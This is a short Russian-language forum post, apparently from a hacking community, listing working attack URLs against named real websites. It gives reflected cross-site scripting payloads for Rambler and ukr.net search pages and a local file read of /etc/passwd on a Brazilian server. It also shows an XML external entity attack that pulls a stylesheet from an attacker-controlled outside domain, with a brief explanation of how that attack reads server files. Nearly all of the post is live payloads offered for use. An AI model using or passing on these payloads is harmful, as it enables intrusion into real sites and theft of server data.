
26.07.2015, 06:57
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 29
Репутация:
0
|
|
Нашел на Рамблере XSS:
Код:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net
Код:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
Код:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
Код:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
И потом выводим на экран &passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
|
|
|